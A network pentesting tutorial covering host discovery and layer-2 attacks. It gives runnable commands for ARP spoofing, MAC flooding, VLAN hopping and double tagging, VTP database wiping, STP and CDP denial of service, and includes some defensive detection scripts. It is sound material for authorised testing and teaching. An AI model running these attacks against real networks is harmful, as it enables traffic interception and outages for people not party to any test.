Pentesting Mtandao


Discovering hosts from the outside

This is going to be a brief section about how to find IPs responding from the Internet.
In this situation you have a range of IPs (maybe even several ranges) and you just need to find which IPs are responding.

ICMP

This is the easiest and fastest way to discover whether a host is up or not.
You could try to send some ICMP packets and expect responses. The easiest way is just to send an echo request and expect a response. You can do that using a simple ping or using fping for ranges.
You could also use nmap to send other types of ICMP packets (this will avoid filters on the common ICMP echo request-response).

```bash
ping -c 1 199.66.11.4    # 1 echo request to a host
fping -g 199.66.11.0/24  # Send echo requests to ranges
nmap -PE -PM -PP -sn -n 199.66.11.0/24 #Send echo, timestamp requests and subnet mask requests
```

TCP Port Discovery

It is very common to find that all kinds of ICMP packets are being filtered. Then, all you can do to check whether a host is up is to try to find open ports. Each host has 65535 ports, so if you have a "big" scope you cannot test whether each port of each host is open or not; that would take too much time.
Then, what you need is a fast port scanner (masscan) and a list of the most used ports:

```bash
#Using masscan to scan top20ports of nmap in a /24 range (less than 5min)
masscan -p20,21-23,25,53,80,110,111,135,139,143,443,445,993,995,1723,3306,3389,5900,8080 199.66.11.0/24
```

You could also perform this step with nmap, but it is slower and nmap has some problems identifying hosts that are up.

HTTP Port Discovery

This is just a TCP port discovery useful when you want to focus on discovering HTTP services:

```bash
masscan -p80,443,8000-8100,8443 199.66.11.0/24
```

UDP Port Discovery

You could also try to check whether some UDP port is open to decide whether you should pay more attention to a host. Since UDP services usually don't respond with any data to a regular empty UDP probe packet, it is difficult to say whether a port is being filtered or open. The easiest way to decide this is to send a packet related to the running service, and since you don't know which service is running, you should try the most probable one based on the port number:

```bash
nmap -sU -sV --version-intensity 0 -F -n 199.66.11.53/24
# The -sV will make nmap test each possible known UDP service packet
# The "--version-intensity 0" will make nmap only test the most probable
```

The nmap line proposed above will test the top 1000 UDP ports on every host in the /24 range, but even this alone will take >20 min. If you need faster results you can use udp-proto-scanner: ./udp-proto-scanner.pl 199.66.11.53/24 This will send these UDP probes to their expected port (for a /24 range this will take just 1 min): DNSStatusRequest, DNSVersionBindReq, NBTStat, NTPRequest, RPCCheck, SNMPv3GetRequest, chargen, citrix, daytime, db2, echo, gtpv1, ike, ms-sql, ms-sql-slam, netop, ntp, rpc, snmp-public, systat, tftp, time, xdmcp.

SCTP Port Discovery

```bash
#Probably useless, but it's pretty fast, why not try it?
nmap -T4 -sY -n --open -Pn <IP/range>
```

Pentesting Wifi

Here you can find a nice guide to all the known Wifi attacks at the time of writing:

Pentesting Wifi

Discovering hosts from the inside

If you are inside the network, one of the first things you will want to do is to discover other hosts. Depending on how much noise you can/want to make, different actions can be performed:

Passive

You can use these tools to passively discover hosts inside the connected network:

```bash
netdiscover -p
p0f -i eth0 -p -o /tmp/p0f.log
# Bettercap
net.recon on/off #Read local ARP cache periodically
net.show
set net.show.meta true #more info
```

Active

Note that the techniques mentioned in Discovering hosts from the outside (TCP/HTTP/UDP/SCTP Port Discovery) can also be applied here.
But, as you are in the same network as the other hosts, you can do more things:

```bash
#ARP discovery
nmap -sn <Network> #ARP Requests (Discover IPs)
netdiscover -r <Network> #ARP requests (Discover IPs)

#NBT discovery
nbtscan -r 192.168.0.1/24 #Search in Domain

# Bettercap
net.probe on/off #Discover hosts on current subnet by probing with ARP, mDNS, NBNS, UPNP, and/or WSD
set net.probe.mdns true/false #Enable mDNS discovery probes (default=true)
set net.probe.nbns true/false #Enable NetBIOS name service discovery probes (default=true)
set net.probe.upnp true/false #Enable UPNP discovery probes (default=true)
set net.probe.wsd true/false #Enable WSD discovery probes (default=true)
set net.probe.throttle 10 #10ms between probes sent (default=10)

#IPv6
alive6 <IFACE> # Send a pingv6 to multicast.
```

Active ICMP

Note that the techniques mentioned in Discovering hosts from the outside (ICMP) can also be applied here.
But, as you are in the same network as the other hosts, you can do more things:

  • If you ping a subnet broadcast address the ping should reach every host and they could respond to you: ping -b 10.10.5.255
  • Pinging the network broadcast address you could even find hosts inside other subnets: ping -b 255.255.255.255
  • Use the -PE, -PP, -PM flags of nmap to perform host discovery by sending, respectively, ICMPv4 echo, timestamp, and subnet mask requests: nmap -PE -PM -PP -sn -vvv -n 10.12.5.0/24

Wake On Lan

Wake On Lan is used to turn on computers through a network message. The magic packet used to turn on the computer is just a packet where a MAC Dst is provided and then it is repeated 16 times inside the same packet.
This kind of packet is usually sent in an ethernet 0x0842 frame or in a UDP packet to port 9.
If no [MAC] is provided, the packet is sent to broadcast ethernet (and the broadcast MAC will be the one being repeated).

```bash
# Bettercap (if no [MAC] is specified ff:ff:ff:ff:ff:ff will be used/entire broadcast domain)
wol.eth [MAC] #Send a WOL as a raw ethernet packet of type 0x0842
wol.udp [MAC] #Send a WOL as an IPv4 broadcast packet to UDP port 9
```
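As an added illustration (not part of the original page), the magic packet layout described above in Python: the standard format is a 6-byte sync stream of 0xFF followed by the target MAC repeated 16 times, identical whether it travels in an Ethernet 0x0842 frame or a UDP datagram to port 9. The parser is what a defender would run over UDP/9 payloads in a capture to see which host a packet is trying to wake; the MAC addresses are constructed sample values.

```python
import re
from typing import Optional

# Standard WoL layout: 6 bytes of 0xFF (the sync stream), then the target MAC 16 times.
SYNC_STREAM = b"\xff" * 6
BROADCAST_MAC = "ff:ff:ff:ff:ff:ff"


def mac_to_bytes(mac: str) -> bytes:
    """Accept aa:bb:cc:dd:ee:ff, aa-bb-cc-dd-ee-ff or aabbccddeeff and return 6 raw bytes."""
    digits = re.sub(r"[^0-9a-fA-F]", "", mac)
    if len(digits) != 12:
        raise ValueError(f"not a MAC address: {mac!r}")
    return bytes.fromhex(digits)


def bytes_to_mac(raw: bytes) -> str:
    return ":".join(f"{b:02x}" for b in raw)


def build_magic_packet(mac: Optional[str] = None) -> bytes:
    """Payload of a magic packet; with no MAC the broadcast MAC is repeated,
    which matches the bettercap default shown above."""
    target = mac_to_bytes(mac or BROADCAST_MAC)
    return SYNC_STREAM + target * 16


def extract_wol_target(payload: bytes) -> Optional[str]:
    """Return the MAC a UDP/9 (or ethertype 0x0842) payload would wake,
    or None if the payload is not a well-formed magic packet.
    Bytes may precede the sync stream and a SecureOn password may follow
    the 16 repetitions, so only the 102-byte core is validated."""
    start = payload.find(SYNC_STREAM)
    while start >= 0:
        body = payload[start + 6:start + 6 + 96]
        if len(body) == 96 and body == body[:6] * 16:
            return bytes_to_mac(body[:6])
        # A run of 0xFF inside other data: keep looking after this position.
        start = payload.find(SYNC_STREAM, start + 1)
    return None


def is_broadcast_wake(payload: bytes) -> bool:
    """True when the packet wakes every host in the broadcast domain."""
    return extract_wol_target(payload) == BROADCAST_MAC
```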

Scanning Hosts

Once you have discovered all the IPs (external or internal) you want to scan in depth, different actions can be performed.

TCP

  • Open port: SYN --> SYN/ACK --> RST
  • Closed port: SYN --> RST/ACK
  • Filtered port: SYN --> [NO RESPONSE]
  • Filtered port: SYN --> ICMP message

```bash
# Nmap fast scan for the most 1000tcp ports used
nmap -sV -sC -O -T4 -n -Pn -oA fastscan <IP>
# Nmap fast scan for all the ports
nmap -sV -sC -O -T4 -n -Pn -p- -oA fullfastscan <IP>
# Nmap fast scan for all the ports slower to avoid failures due to -T4
nmap -sV -sC -O -p- -n -Pn -oA fullscan <IP>

#Bettercap Scan
syn.scan 192.168.1.0/24 1 10000 #Ports 1-10000
```

UDP

There are 2 options to scan a UDP port:

  • Send a UDP packet and check for the response ICMP unreachable if the UDP port is closed (in several cases ICMP will be filtered, so you won't receive any information about whether the port is closed or open).
  • Send formatted datagrams to elicit a response from a service (e.g., DNS, DHCP, TFTP, and others, as listed in nmap-payloads). If you receive a response, then the port is open.

Nmap will mix both options using "-sV" (UDP scans are very slow), but note that UDP scans are slower than TCP scans:

```bash
# Check if any of the most common udp services is running
udp-proto-scanner.pl <IP>
# Nmap fast check if any of the 100 most common UDP services is running
nmap -sU -sV --version-intensity 0 -n -F -T4 <IP>
# Nmap check if any of the 100 most common UDP services is running and launch defaults scripts
nmap -sU -sV -sC -n -F -T4 <IP>
# Nmap "fast" top 1000 UDP ports
nmap -sU -sV --version-intensity 0 -n -T4 <IP>
# You could use nmap to test all the UDP ports, but that will take a lot of time
```

SCTP Scan

SCTP (Stream Control Transmission Protocol) is designed to be used alongside TCP (Transmission Control Protocol) and UDP (User Datagram Protocol). Its main purpose is to facilitate the transport of telephony data over IP networks, mirroring many of the reliability features found in Signaling System 7 (SS7). SCTP is a core component of the SIGTRAN protocol family, which aims to transport SS7 signals over IP networks.

Support for SCTP is available in various operating systems, such as IBM AIX, Oracle Solaris, HP-UX, Linux, Cisco IOS, and VxWorks, indicating its broad acceptance and utility in the telecommunications and networking fields.

Two different scans for SCTP are offered by nmap: -sY and -sZ

```bash
# Nmap fast SCTP scan
nmap -T4 -sY -n -oA SCTFastScan <IP>
# Nmap all SCTP scan (-F cannot be combined with -p-, so it is not used here)
nmap -T4 -p- -sY -sV -sC -n -oA SCTAllScan <IP>
```

IDS and IPS evasion

IDS and IPS Evasion

More nmap options

Nmap Summary (ESP)

Revealing Internal IP Addresses

Misconfigured routers, firewalls, and network devices sometimes respond to network probes using non-public source addresses. tcpdump can be used to identify packets received from private addresses during testing. Specifically, on Kali Linux, packets can be captured on the eth2 interface, which is accessible from the public Internet. It is important to note that if your setup is behind NAT or a firewall, such packets are likely to be filtered.

```bash
tcpdump -nt -i eth2 src net 10 or 172.16/12 or 192.168/16
tcpdump: verbose output suppressed, use -v or -vv for full protocol decode
listening on eth2, link-type EN10MB (Ethernet), capture size 65535 bytes
IP 10.10.0.1 > 185.22.224.18: ICMP echo reply, id 25804, seq 1582, length 64
IP 10.10.0.2 > 185.22.224.18: ICMP echo reply, id 25804, seq 1586, length 64
```

Sniffing

By sniffing you can learn details of IP ranges, subnet sizes, MAC addresses, and hostnames by reviewing captured frames and packets. If the network is misconfigured or the switching fabric is under stress, attackers can capture sensitive material via passive network sniffing.

If a switched Ethernet network is set up properly, you will only see broadcast frames and material destined for your own MAC address.

TCPDump

```bash
sudo tcpdump -i <INTERFACE> udp port 53 #Listen to DNS request to discover what is searching the host
tcpdump -i <IFACE> icmp #Listen to icmp packets
sudo bash -c "sudo nohup tcpdump -i eth0 -G 300 -w \"/tmp/dump-%m-%d-%H-%M-%S-%s.pcap\" -W 50 'tcp and (port 80 or port 443)' &"
```

One can also capture packets from a remote machine over an SSH session with Wireshark as the GUI in real time.

```bash
ssh user@<TARGET IP> tcpdump -i ens160 -U -s0 -w - | sudo wireshark -k -i -
ssh <USERNAME>@<TARGET IP> tcpdump -i <INTERFACE> -U -s0 -w - 'port not 22' | sudo wireshark -k -i - # Exclude SSH traffic
```

Bettercap

```bash
net.sniff on
net.sniff stats
set net.sniff.output sniffed.pcap #Write captured packets to file
set net.sniff.local  #If true it will consider packets from/to this computer, otherwise it will skip them (default=false)
set net.sniff.filter #BPF filter for the sniffer (default=not arp)
set net.sniff.regexp #If set only packets matching this regex will be considered
```

Wireshark

Obviously.

Capturing credentials

You can use tools like https://github.com/lgandx/PCredz to parse credentials from a pcap or a live interface.

LAN attacks

ARP spoofing

ARP Spoofing consists in sending gratuitous ARP responses to indicate that the IP of a machine has the MAC of our device. Then, the victim will change its ARP table and will contact our machine every time it wants to contact the spoofed IP.

Bettercap

```bash
arp.spoof on
set arp.spoof.targets <IP> #Specific targets to ARP spoof (default=<entire subnet>)
set arp.spoof.whitelist #Specific targets to skip while spoofing
set arp.spoof.fullduplex true #If true, both the targets and the gateway will be attacked, otherwise only the target (default=false)
set arp.spoof.internal true #If true, local connections among computers of the network will be spoofed, otherwise only connections going to and coming from the Internet (default=false)
```

Arpspoof

```bash
echo 1 > /proc/sys/net/ipv4/ip_forward
arpspoof -t 192.168.1.1 192.168.1.2
arpspoof -t 192.168.1.2 192.168.1.1
```
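An added detection-side example (not from the original page or from bettercap/arpspoof): a small arpwatch-style monitor in Python that learns IP-to-MAC bindings from ARP traffic and alerts when a binding changes, which is exactly what the gratuitous replies described above produce on the wire. The frames and MAC addresses are constructed sample data, and ARP is decoded by hand so the block runs without scapy.

```python
import ipaddress
import struct
from typing import Dict, List, Optional

ETHERTYPE_ARP = 0x0806
ARP_REQUEST, ARP_REPLY = 1, 2


def mac_to_bytes(mac: str) -> bytes:
    return bytes.fromhex(mac.replace(":", ""))


def bytes_to_mac(raw: bytes) -> str:
    return ":".join(f"{b:02x}" for b in raw)


def build_arp_frame(op: int, sender_mac: str, sender_ip: str,
                    target_mac: str, target_ip: str,
                    eth_dst: str = "ff:ff:ff:ff:ff:ff") -> bytes:
    """Constructed Ethernet/ARP frame used as sample capture input."""
    eth = mac_to_bytes(eth_dst) + mac_to_bytes(sender_mac) + struct.pack("!H", ETHERTYPE_ARP)
    arp = struct.pack("!HHBBH", 1, 0x0800, 6, 4, op)   # Ethernet, IPv4, hlen, plen, opcode
    arp += mac_to_bytes(sender_mac) + ipaddress.ip_address(sender_ip).packed
    arp += mac_to_bytes(target_mac) + ipaddress.ip_address(target_ip).packed
    return eth + arp


def parse_arp(frame: bytes) -> Optional[dict]:
    """Decode an IPv4-over-Ethernet ARP frame; return None for anything else."""
    if len(frame) < 42 or struct.unpack("!H", frame[12:14])[0] != ETHERTYPE_ARP:
        return None
    htype, ptype, hlen, plen, op = struct.unpack("!HHBBH", frame[14:22])
    if (htype, ptype, hlen, plen) != (1, 0x0800, 6, 4):
        return None
    spa, tpa = frame[28:32], frame[38:42]
    return {
        "op": op,
        "sender_mac": bytes_to_mac(frame[22:28]),
        "sender_ip": str(ipaddress.ip_address(spa)),
        "target_ip": str(ipaddress.ip_address(tpa)),
        # Gratuitous ARP: the sender announces its own IP (sender IP == target IP).
        "gratuitous": spa == tpa,
    }


class ArpWatch:
    """Keep the IP -> MAC bindings seen on the wire and flag when a binding changes.
    A second MAC suddenly claiming an IP already bound to another MAC, typically via
    gratuitous replies, is the on-wire signature of the spoofing described above."""

    def __init__(self, protected_ips: List[str]):
        self.table: Dict[str, str] = {}
        self.protected = set(protected_ips)   # e.g. gateway, DNS and DHCP servers

    def observe(self, frame: bytes) -> Optional[str]:
        pkt = parse_arp(frame)
        if pkt is None or pkt["op"] not in (ARP_REQUEST, ARP_REPLY):
            return None
        ip, mac = pkt["sender_ip"], pkt["sender_mac"]
        known = self.table.get(ip)
        if known is None:
            self.table[ip] = mac                # first sighting: learn it
            return None
        if known == mac:
            return None
        severity = "CRITICAL" if ip in self.protected else "WARNING"
        kind = "gratuitous reply" if pkt["gratuitous"] and pkt["op"] == ARP_REPLY else "ARP packet"
        return f"{severity}: {ip} changed from {known} to {mac} ({kind})"


def scan_capture(frames: List[bytes], protected_ips: List[str]) -> List[str]:
    """Run ArpWatch over a list of raw frames and return every alert raised."""
    watch = ArpWatch(protected_ips)
    alerts = [watch.observe(f) for f in frames]
    return [a for a in alerts if a is not None]
```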

MAC Flooding - CAM overflow

Overflow the switch's CAM table by sending a lot of packets with different source MAC addresses. When the CAM table is full, the switch starts behaving like a hub (broadcasting all the traffic).

```bash
macof -i <interface>
```

In modern switches this vulnerability has been fixed.

802.1Q VLAN / DTP Attacks

Dynamic Trunking

The Dynamic Trunking Protocol (DTP) is designed as a link layer protocol to facilitate an automatic system for trunking, allowing switches to select ports for trunk mode (Trunk) or non-trunk mode automatically. The deployment of DTP is often seen as indicative of suboptimal network design, underscoring the importance of manually configuring trunks only where necessary and ensuring proper documentation.

By default, switch ports are set to operate in Dynamic Auto mode, meaning they are ready to initiate trunking if prompted by a neighboring switch. A security concern arises when a pentester or attacker connects to the switch and sends a DTP Desirable frame, forcing the port into trunk mode. This action enables the attacker to enumerate VLANs through STP frame analysis and circumvent VLAN segmentation by setting up virtual interfaces.

The presence of DTP in many switches by default can be exploited by adversaries to mimic a switch's behavior, thereby gaining access to traffic across all VLANs. The script dtpscan.sh is used to monitor an interface, revealing whether a switch is in Default, Trunk, Dynamic, Auto, or Access mode; the last one is the only configuration immune to VLAN hopping attacks. This tool assesses the switch's vulnerability status.

Should a network vulnerability be identified, the Yersinia tool can be employed to "enable trunking" via the DTP protocol, allowing for the observation of packets from all VLANs.

```bash
apt-get install yersinia #Installation
sudo apt install kali-linux-large #Another way to install it in Kali
yersinia -I #Interactive mode
#In interactive mode you will need to select a interface first
#Then, you can select the protocol to attack using letter "g"
#Finally, you can select the attack using letter "x"

yersinia -G #For graphic mode
```

To enumerate the VLANs it is also possible to generate the DTP Desirable frame with the script DTPHijacking.py. Do not interrupt the script under any circumstances. It injects DTP Desirable every three seconds. The dynamically created trunk channels on the switch only live for five minutes. After five minutes, the trunk falls off.

```bash
sudo python3 DTPHijacking.py --interface eth0
```

I would like to point out that Access/Desirable (0x03) indicates that the DTP frame is of the Desirable type, which tells the port to switch to Trunk mode. And 802.1Q/802.1Q (0xa5) indicates the 802.1Q encapsulation type.

By analyzing the STP frames, we learn about the existence of VLAN 30 and VLAN 60.

Attacking specific VLANs

Once you know the VLAN IDs and IP values, you can configure a virtual interface to attack a specific VLAN.
If DHCP is not available, use ifconfig to set a static IP address.

VLAN interface setup (example)

```bash
root@kali:~# modprobe 8021q
root@kali:~# vconfig add eth1 250
Added VLAN with VID == 250 to IF -:eth1:-
root@kali:~# dhclient eth1.250
Reloading /etc/samba/smb.conf: smbd only.
root@kali:~# ifconfig eth1.250
eth1.250  Link encap:Ethernet  HWaddr 00:0e:c6:f0:29:65
inet addr:10.121.5.86  Bcast:10.121.5.255  Mask:255.255.255.0
inet6 addr: fe80::20e:c6ff:fef0:2965/64 Scope:Link
UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
RX packets:19 errors:0 dropped:0 overruns:0 frame:0
TX packets:13 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:2206 (2.1 KiB)  TX bytes:1654 (1.6 KiB)

root@kali:~# arp-scan -I eth1.250 10.121.5.0/24
```

```bash
# Another configuration example
modprobe 8021q
vconfig add eth1 20
ifconfig eth1.20 192.168.1.2 netmask 255.255.255.0 up
```

```bash
# Another configuration example
sudo vconfig add eth0 30
sudo ip link set eth0.30 up
sudo dhclient -v eth0.30
```

Automatic VLAN Hopper

The discussed attack of Dynamic Trunking and creating virtual interfaces and discovering hosts inside other VLANs is automatically performed by the tool: https://github.com/nccgroup/vlan-hopping---frogger

Double Tagging

If an attacker knows the value of the MAC, IP and VLAN ID of the victim host, he could try to double tag a frame with its designated VLAN and the VLAN of the victim and send a packet. Since the victim won't be able to connect back to the attacker, the best option for the attacker is to communicate via UDP with protocols that can perform some interesting actions (like SNMP).

Another option for the attacker is to launch a TCP port scan spoofing an IP controlled by the attacker and accessible by the victim (probably through the Internet). Then, the attacker could sniff on the second host owned by him to see whether it receives some packets from the victim.

To perform this attack you can use scapy: pip install scapy

```python
from scapy.all import *
# Double tagging with ICMP packet (the response from the victim isn't double tagged so it will never reach the attacker)
packet = Ether()/Dot1Q(vlan=1)/Dot1Q(vlan=20)/IP(dst='192.168.1.10')/ICMP()
sendp(packet)
```
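An added example (mine, not the page's or scapy's) that takes the defender's side of the snippet above: a hand-written 802.1Q tag-stack parser that reports every VLAN ID on a frame and flags the outer-tag-equals-native-VLAN pattern that makes the hop work. Frames, MAC addresses and a native VLAN of 1 are constructed assumptions.

```python
import struct
from typing import List, NamedTuple

# Tag Protocol Identifiers that start a VLAN tag: 802.1Q, 802.1ad service tag, legacy QinQ.
VLAN_TPIDS = {0x8100, 0x88A8, 0x9100}


class TagInfo(NamedTuple):
    vlan_ids: List[int]      # outermost first
    inner_ethertype: int     # ethertype of the payload after all tags
    payload: bytes


def mac_to_bytes(mac: str) -> bytes:
    return bytes.fromhex(mac.replace(":", ""))


def build_tagged_frame(dst: str, src: str, vlan_ids: List[int],
                       ethertype: int, payload: bytes) -> bytes:
    """Constructed Ethernet frame with zero or more stacked 802.1Q tags (sample input)."""
    frame = mac_to_bytes(dst) + mac_to_bytes(src)
    for vid in vlan_ids:
        # TPID 0x8100, then the TCI with PCP=0, DEI=0 and the 12-bit VLAN ID.
        frame += struct.pack("!HH", 0x8100, vid & 0x0FFF)
    return frame + struct.pack("!H", ethertype) + payload


def parse_vlan_tags(frame: bytes) -> TagInfo:
    """Walk the tag stack of an Ethernet frame and return every VLAN ID in order."""
    if len(frame) < 14:
        raise ValueError("frame shorter than an Ethernet header")
    offset = 12
    vlan_ids: List[int] = []
    ethertype = struct.unpack("!H", frame[offset:offset + 2])[0]
    while ethertype in VLAN_TPIDS:
        if len(frame) < offset + 6:
            raise ValueError("truncated VLAN tag")
        tci = struct.unpack("!H", frame[offset + 2:offset + 4])[0]
        vlan_ids.append(tci & 0x0FFF)
        ethertype = struct.unpack("!H", frame[offset + 4:offset + 6])[0]
        offset += 4
    return TagInfo(vlan_ids, ethertype, frame[offset + 2:])


def double_tag_alert(frame: bytes, native_vlan: int) -> str:
    """Classify a frame seen on an access or trunk port.
    The hop described above only works when the outer tag equals the native VLAN of
    the trunk: the switch strips that tag and forwards the frame into the inner VLAN."""
    tags = parse_vlan_tags(frame).vlan_ids
    if len(tags) >= 2 and tags[0] == native_vlan:
        return f"double-tag hop attempt: native {tags[0]} -> inner {tags[1]}"
    if len(tags) >= 2:
        return f"stacked tags {tags} (QinQ or misconfiguration)"
    return "ok"
```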

Lateral VLAN Segmentation Bypass

If you have access to a switch that you are directly connected to, you have the ability to bypass VLAN segmentation within the network. Simply switch the port to trunk mode (otherwise known as trunk), create virtual interfaces with the IDs of the target VLANs, and configure an IP address. You can try requesting the address dynamically (DHCP) or you can configure it statically. It depends on the case.

Lateral VLAN Segmentation Bypass

Layer 3 Private VLAN Bypass

In certain environments, such as guest wireless networks, port isolation (also known as private VLAN) settings are implemented to prevent clients connected to a wireless access point from directly communicating with each other. However, a technique has been identified that can circumvent these isolation measures. This technique exploits either the lack of network ACLs or their improper configuration, enabling IP packets to be routed through a router to reach another client on the same network.

The attack is executed by creating a packet that carries the destination IP address of the target client but with the router's MAC address. This causes the router to mistakenly forward the packet to the target client. This approach is similar to that used in Double Tagging Attacks, where the ability to control a host accessible to the victim is used to exploit the security flaw.

Key Steps of the Attack:

  1. Crafting a Packet: A packet is specially crafted to include the target client's IP address but with the router's MAC address.
  2. Exploiting Router Behavior: The crafted packet is sent to the router, which, due to the configuration, redirects the packet to the target client, bypassing the isolation provided by the private VLAN settings.

VTP Attacks

VTP (VLAN Trunking Protocol) centralizes VLAN management. It uses revision numbers to maintain VLAN database integrity; any modification increments this number. Switches adopt configurations with higher revision numbers, updating their own VLAN databases.

VTP Domain Roles

  • VTP Server: Manages VLANs: creates, deletes, modifies. It broadcasts VTP announcements to domain members.
  • VTP Client: Receives VTP announcements to synchronize its VLAN database. This role is restricted from making local VLAN configuration changes.
  • VTP Transparent: Doesn't engage in VTP updates but forwards VTP announcements. Unaffected by VTP attacks, it maintains a constant revision number of zero.

VTP Advertisement Types

  • Summary Advertisement: Broadcast by the VTP server every 300 seconds, carrying essential domain information.
  • Subset Advertisement: Sent following a VLAN configuration change.
  • Advertisement Request: Issued by a VTP client to request a Summary Advertisement, typically in response to detecting a higher configuration revision number.

VTP vulnerabilities are exploitable exclusively via trunk ports, as VTP announcements circulate solely through them. After a DTP attack, the scenario might pivot towards VTP. Tools like Yersinia can facilitate VTP attacks, aiming to wipe out the VLAN database and effectively disrupting the network.

Note: This discussion pertains to VTP version 1 (VTPv1).

```bash
yersinia -G # Launch Yersinia in graphical mode
```

In Yersinia's graphical mode, choose the deleting all VTP vlans option to purge the VLAN database.

STP Attacks

If you cannot capture BPDU frames on your interfaces, it is unlikely that you will succeed in an STP attack.

STP BPDU DoS

Sending a lot of BPDUs TCP (Topology Change Notification) or Conf (the BPDUs that are sent when the topology is created), the switches get overloaded and stop working correctly.

```bash
yersinia stp -attack 2
yersinia stp -attack 3
#Use -M to disable MAC spoofing
```

STP TCP Attack

When a TCP is sent, the CAM table of the switches will be deleted in 15s. Then, if you keep sending this kind of packets, the CAM table will be restarted continuously (or every 15 seconds), and when it is restarted the switch behaves as a hub.

```bash
yersinia stp -attack 1 #Will send 1 TCP packet and the switch should restore the CAM in 15 seconds
yersinia stp -attack 0 #Will send 1 CONF packet, nothing else will happen
```

STP Root Attack

The attacker simulates the behaviour of a switch to become the STP root of the network. Then, more data will pass through it. This is interesting when you are connected to two different switches.
This is done by sending BPDUs CONF packets saying that the priority value is lower than the actual priority of the actual root switch.

```bash
yersinia stp -attack 4 #Behaves like the root switch
yersinia stp -attack 5 #This will make the device behaves as a switch but will not be root
```

If the attacker is connected to 2 switches he can be the root of the new tree and all the traffic between those switches will pass through him (a MITM attack will be performed).

```bash
yersinia stp -attack 6 #This will cause a DoS as the layer 2 packets wont be forwarded. You can use Ettercap to forward those packets "Sniff" --> "Bridged sniffing"
ettercap -T -i eth1 -B eth2 -q #Set a bridge between 2 interfaces to forwardpackages
```
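An added defender-side example (not part of the original page or of Yersinia): a Python decoder for configuration and TCN BPDUs, with a check for frames that claim a root bridge ID better than the bridge you know to be root (the root attack above) and a counter for TCN bursts (the CAM-flush attack above). Frames, priorities and MAC addresses are constructed sample values.

```python
import struct
from typing import Dict, List, Optional

STP_MULTICAST = bytes.fromhex("0180c2000000")   # destination of every BPDU
LLC_STP = b"\x42\x42\x03"                       # DSAP/SSAP 0x42, UI control field
BPDU_CONFIG, BPDU_RSTP, BPDU_TCN = 0x00, 0x02, 0x80


def mac_to_bytes(mac: str) -> bytes:
    return bytes.fromhex(mac.replace(":", ""))


def bytes_to_mac(raw: bytes) -> str:
    return ":".join(f"{b:02x}" for b in raw)


def bridge_id(priority: int, mac: str) -> bytes:
    """8-byte bridge identifier: 16-bit priority followed by the bridge MAC.
    Lower wins; big-endian bytes compare exactly like the integer value."""
    return struct.pack("!H", priority) + mac_to_bytes(mac)


def build_config_bpdu(src_mac: str, root_priority: int, root_mac: str,
                      bridge_priority: int, bridge_mac: str, path_cost: int = 0) -> bytes:
    """Constructed 802.1D configuration BPDU inside an 802.3/LLC frame (sample input)."""
    body = struct.pack("!HBBB", 0, 0, BPDU_CONFIG, 0)            # protocol id, version, type, flags
    body += bridge_id(root_priority, root_mac) + struct.pack("!I", path_cost)
    body += bridge_id(bridge_priority, bridge_mac) + struct.pack("!H", 0x8001)   # port id
    body += struct.pack("!HHHH", 0, 20 * 256, 2 * 256, 15 * 256)  # age, max age, hello, fwd delay (1/256 s)
    llc = LLC_STP + body
    return STP_MULTICAST + mac_to_bytes(src_mac) + struct.pack("!H", len(llc)) + llc


def build_tcn_bpdu(src_mac: str) -> bytes:
    """Constructed Topology Change Notification BPDU (the 'TCP' packet above)."""
    llc = LLC_STP + struct.pack("!HBB", 0, 0, BPDU_TCN)
    return STP_MULTICAST + mac_to_bytes(src_mac) + struct.pack("!H", len(llc)) + llc


def parse_bpdu(frame: bytes) -> Optional[Dict]:
    """Decode a BPDU; return None for frames that are not STP."""
    if len(frame) < 21 or frame[:6] != STP_MULTICAST or frame[14:17] != LLC_STP:
        return None
    bpdu = frame[17:]
    protocol_id, version, bpdu_type = struct.unpack("!HBB", bpdu[:4])
    if protocol_id != 0:
        return None
    info: Dict = {"src": bytes_to_mac(frame[6:12]), "version": version, "type": bpdu_type}
    if bpdu_type == BPDU_TCN:
        return info
    if bpdu_type not in (BPDU_CONFIG, BPDU_RSTP) or len(bpdu) < 35:
        return None
    root, bridge = bpdu[5:13], bpdu[17:25]
    info.update(
        flags=bpdu[4],
        root_id=root,
        root_priority=struct.unpack("!H", root[:2])[0],
        root_mac=bytes_to_mac(root[2:]),
        path_cost=struct.unpack("!I", bpdu[13:17])[0],
        bridge_priority=struct.unpack("!H", bridge[:2])[0],
        bridge_mac=bytes_to_mac(bridge[2:]),
    )
    return info


def claims_better_root(frame: bytes, expected_priority: int, expected_mac: str) -> bool:
    """True when a configuration BPDU advertises a root bridge ID numerically lower than
    the bridge known to be root: the exact claim the root attack above makes."""
    info = parse_bpdu(frame)
    if info is None or "root_id" not in info:
        return False
    return info["root_id"] < bridge_id(expected_priority, expected_mac)


def count_tcn(frames: List[bytes]) -> int:
    """Number of TCN BPDUs in a window; a sustained stream is the CAM-flush DoS above."""
    return sum(1 for f in frames if (parse_bpdu(f) or {}).get("type") == BPDU_TCN)
```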

CDP Attacks

CISCO Discovery Protocol (CDP) is essential for communication between CISCO devices, allowing them to identify each other and share configuration details.

Passive Data Collection

CDP is configured to broadcast information through all ports, which might lead to a security risk. An attacker, upon connecting to a switch port, could deploy network sniffers like Wireshark, tcpdump, or Yersinia. This action can reveal sensitive data about the network device, including its model and the version of Cisco IOS it runs. The attacker might then target specific vulnerabilities in the identified Cisco IOS version.

Inducing CDP Table Flooding

A more aggressive approach involves launching a Denial of Service (DoS) attack by overwhelming the switch's memory, pretending to be legitimate CISCO devices. Below is the command sequence to initiate such an attack using Yersinia, a network tool designed for testing:

```bash
sudo yersinia cdp -attack 1 # Initiates a DoS attack by simulating fake CISCO devices
# Alternatively, for a GUI approach:
sudo yersinia -G
```

During this attack, the switch's CPU and CDP neighbor table are heavily burdened, leading to what is often referred to as "network paralysis" due to excessive resource consumption.

CDP Impersonation Attack

```bash
sudo yersinia cdp -attack 2 #Simulate a new CISCO device
sudo yersinia cdp -attack 0 #Send a CDP packet
```

You could also use scapy. Be sure to install it with the scapy/contrib package.

VoIP Attacks and the VoIP Hopper Tool

VoIP phones, increasingly integrated with IoT devices, offer functionalities like unlocking doors or controlling thermostats through special phone numbers. However, this integration can pose security risks.

The tool voiphopper is designed to emulate a VoIP phone in various environments (Cisco, Avaya, Nortel, Alcatel-Lucent). It discovers the voice network's VLAN ID using protocols like CDP, DHCP, LLDP-MED, and 802.1Q ARP.

VoIP Hopper offers three modes for the Cisco Discovery Protocol (CDP):

  1. Sniff Mode (-c 0): Analyzes network packets to identify the VLAN ID.
  2. Spoof Mode (-c 1): Generates custom packets mimicking those of an actual VoIP device.
